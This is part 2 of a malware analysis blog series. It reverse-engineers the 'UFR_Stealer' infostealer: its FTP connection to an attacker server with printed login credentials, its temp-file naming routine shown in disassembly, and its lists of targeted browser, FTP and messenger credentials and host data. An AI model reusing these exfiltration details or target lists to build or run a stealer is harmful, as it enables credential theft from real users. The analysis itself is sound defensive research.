Tried, Tested and Proven
The following is part 2 of a series of 3 blog posts. In this article we go through the preparation stage that is undertaken to later exfiltrate the stolen data, which starts with connecting to a remote FTP server and goes on with temporarily storing the data in the host that will be later sent to the attacker.

Part 1 focussed on a one-shot information stealing malware. If you have missed the first article, please click here!

Connecting to the FTP server

The malware will initially retrieve the local date/time in the following format: “d-m-y_h-m-s”.

Example: “12-09-2013_11-21-50″

Then, it will create a new hidden folder named “ufr_files” in the same directory where the executable is located. It will then proceed to retrieve the absolute path to the system’s ‘temp’ folder by calling the GetTempPathA API. It will need this information later on.

Next, it will attempt to connect to an FTP server where it will later upload the stolen data. If the connection fails, it will terminate itself.

Note: Part of the malicious URL was replaced with [deleted] for safety reasons. You can use the hex bytes to reconstruct it.

Call InternetConnectA

Stack
0085FF98   00CC0004  |Arg1 = 00CC0004
0085FF9C   004122FC  |Arg2 = 004122FC ASCII "cs-[deleted].ucoz.ru" ← server name
0085FFA0   00000015   |Arg3 = 00000015 ←  server port
0085FFA4   004123FC  |Arg4 = 004123FC ASCII "0cs-promotion" ←  username
0085FFA8   004124FC  |Arg5 = 004124FC ASCII "lollol63" ←  password
0085FFAC   00000001  |Arg6 = 00000001 ←  INTERNET_SERVICE_FTP
0085FFB0   08000000   |Arg7 = 08000000 ←  INTERNET_FLAG_PASSIVE
0085FFB4   000000FF  \Arg8 = 000000FF

Looking at the FTP password in use, we should at least admit that whoever created this malware has at least some sense of humour!

If the connection to the FTP server is successful, then it will attempt to create a new folder on the server, named “UFR_Stealer” and if this step succeeds it will then set this as the current working directory on the FTP server.

Creating the stolen data storage file

The malware creates a file to store all the data that it managed to retrieve before compressing, encrypting and sending it over to the FTP server.

In order to ensure that the file has always a unique name, in addition to using the date and time in the name, it will also make use of a custom algorithm to create a random 4 character string to be appended to the file name.


00401EF3    55              PUSH    EBP
00401EF4    8BEC            MOV     EBP, ESP
00401EF6    60              PUSHAD
00401EF7    FF15 AC004100   CALL    DWORD PTR DS:[4100AC] ; kernel32.GetTickCount
00401EFD    8BF8            MOV     EDI, EAX
00401EFF    8B4D 0C         MOV     ECX, DWORD PTR SS:[EBP+C]
00401F02    8B75 08         MOV     ESI, DWORD PTR SS:[EBP+8]
00401F05    C60431 00       MOV     BYTE PTR DS:[ECX+ESI], 0
00401F09    0F31            RDTSC
00401F0B    33C7            XOR     EAX, EDI
00401F0D    D3C0            ROL     EAX, CL
00401F0F    8BD8            MOV     EBX, EAX
00401F11    83E3 0F         AND     EBX, 0F
00401F14    83EB BF         SUB     EBX, -41
00401F17    885C31 FF       MOV     BYTE PTR DS:[ECX+ESI-1], BL
00401F1B    49              DEC     ECX
00401F1C  ^ 0F85 E7FFFFFF   JNZ     00401F09
00401F22    61              POPAD
00401F23    C9              LEAVE
00401F24    C2 0800         RET     8

Then, it will prepend the key word “report_” and it will create a file in the system’s temp folder with “.bin” extension.

0085FFA4   0042FC38  |FileName = "C:\DOCUME~1\username\LOCALS~1\Temp\report_12-09-2013_11-21-50-JNNC.bin"
0085FFA8   C0000000  |Access = GENERIC_READ|GENERIC_WRITE
0085FFAC   00000003  |ShareMode = FILE_SHARE_READ|FILE_SHARE_WRITE
0085FFB0   00000000   |pSecurity = NULL
0085FFB4   00000002   |Mode = CREATE_ALWAYS
0085FFB8   00000000   |Attributes = 0
0085FFBC   00000000  \hTemplateFile = NULL

This file will be used by the malware as temporary storage for the information it is about to retrieve from the host.

Information Stealing

During this stage, the malware will call a series of functions. Each function contains code that targets specific data associated with specific applications and other general host related information.

00404859    E8 A90B0000     CALL    00405407
0040485E    0105 381C4300   ADD     DWORD PTR DS:[431C38], EAX
00404864    E8 91110000     CALL    004059FA
00404869    0105 381C4300   ADD     DWORD PTR DS:[431C38], EAX
0040486F    E8 7F160000     CALL    00405EF3
00404874    0105 381C4300   ADD     DWORD PTR DS:[431C38], EAX
0040487A    E8 5A1F0000     CALL    004067D9
0040487F    0105 381C4300   ADD     DWORD PTR DS:[431C38], EAX
00404885    E8 C3210000     CALL    00406A4D
0040488A    0105 381C4300   ADD     DWORD PTR DS:[431C38], EAX
00404890    E8 6A290000     CALL    004071FF
00404895    0105 381C4300   ADD     DWORD PTR DS:[431C38], EAX
0040489B    E8 172B0000     CALL    004073B7
004048A0    0105 381C4300   ADD     DWORD PTR DS:[431C38], EAX
004048A6    E8 37310000     CALL    004079E2
004048AB    0105 381C4300   ADD     DWORD PTR DS:[431C38], EAX
004048B1    E8 F0320000     CALL    00407BA6
004048B6    0105 381C4300   ADD     DWORD PTR DS:[431C38], EAX
004048BC    E8 0C3E0000     CALL    004086CD
004048C1    0105 381C4300   ADD     DWORD PTR DS:[431C38], EAX
004048C7    E8 0B430000     CALL    00408BD7
004048CC    0105 381C4300   ADD     DWORD PTR DS:[431C38], EAX
004048D2    E8 DF6F0000     CALL    0040B8B6
004048D7    0105 381C4300   ADD     DWORD PTR DS:[431C38], EAX
004048DD    E8 D91A0000     CALL    004063BB
004048E2    0105 381C4300   ADD     DWORD PTR DS:[431C38], EAX
004048E8    E8 7A390000     CALL    00408267
004048ED    0105 381C4300   ADD     DWORD PTR DS:[431C38], EAX
004048F3    E8 70480000     CALL    00409168
004048F8    0105 381C4300   ADD     DWORD PTR DS:[431C38], EAX
004048FE    E8 7E4A0000     CALL    00409381
00404903    0105 381C4300   ADD     DWORD PTR DS:[431C38], EAX
00404909    E8 E44F0000     CALL    004098F2
0040490E    0105 381C4300   ADD     DWORD PTR DS:[431C38], EAX
00404914    E8 63560000     CALL    00409F7C
00404919    0105 381C4300   ADD     DWORD PTR DS:[431C38], EAX
0040491F    E8 31620000     CALL    0040AB55
00404924    0105 381C4300   ADD     DWORD PTR DS:[431C38], EAX
0040492A    E8 F3660000     CALL    0040B022
0040492F    0105 381C4300   ADD     DWORD PTR DS:[431C38], EAX
00404935    E8 EF700000     CALL    0040BA29

Credentials Stealing:

1) Mozilla FireFox
2) QIP messenger
3) Google Chrome
4) MS .Net Passport
5) SmartFTP
6) The Bat!
7) Far Manager (FTP Plugin)
8) ICQ
9) Mail.Ru Mail Agent
10) Miranda IM
11) Google Talk
12) Opera
13) WindowsLive Credentials
14) FileZilla
15) FlashFXP
16) Internet Explorer
17) Total Commander (FTP)
18) Pidgin

Other Info Stealing:

1) Local Time
2) System Default Language
3) Computer Name
4) Screen Size
5) Bits per pixel
6) Logical Drives/ Size information of hardrives/flash drives
7) UserName
8) CPU info (Processor Name and Model Identifier)
9) Windows Version + Service Pack
10) Memory Info (Total Physical, Total Free)
11) Process Enumeration
12) Local User Accounts Enumeration (user account, including the account name, comments associated with
the account, and the user’s full name.)
13) Installed Programs/ Windows Updates
14) Full path to common directories such as My Documents, Startup, System32, Temp, Windows, Program files,
current Location of the malware itself
15) Windows Serial Key
16) Host internal IP

Clearly, the malware is targeting very sensitive information such as FTP login credentials, website credentials stored in different browsers, as well as credentials related to mail clients and instant messengers. Furthermore, it retrieves a lot of information regarding the host configuration including processor type, RAM amount, Windows version, available drives, processes running, the Windows activation key as well as other detailed information as shown in the list above.

Another interesting observation is the fact that if no credentials/password data was found then once the collection of the information is done, the malware will prepend the keyword “NO_PWDS_” to the filename where it stores the data. This is probably used for quick filtering of the files received based on importance. Obviously, files that contain passwords have a priority upon the rest.

Example: “NO_PWDS_report_12-09-2013_11-21-50-JNNC.bin

Conclusion

In this part, we examined how the malware creates an FTP connection, as well as how and what information it steals. This malware is clearly interested in sensitive information that can be used in order to further compromise this and other hosts through the credentials retrieved. This kind of activity indicates that the malware authors are potentially interested in corporate espionage, as the malware is actively searching for FTP credentials.

In the next article (part 3), we will look at the methods used by the malware to compress and encrypt the data before sending it over to the attacker’s FTP server, and we will also discuss the code dedicated to Anti-Reversing techniques.

Did you miss the first article? You can find it here: Part 1 – MutexName: “UFR_Stealer_2600″

Written by: Kyriakos Economou of Portcullis.

Any questions/feedback?

If you have any further question/feedback regarding the MutexName: “UFR_Stealer_2600″ article – part 2, please do get in touch!
We would like to hear your thoughts. You may contact us at: labs@portcullis-security.com

Categories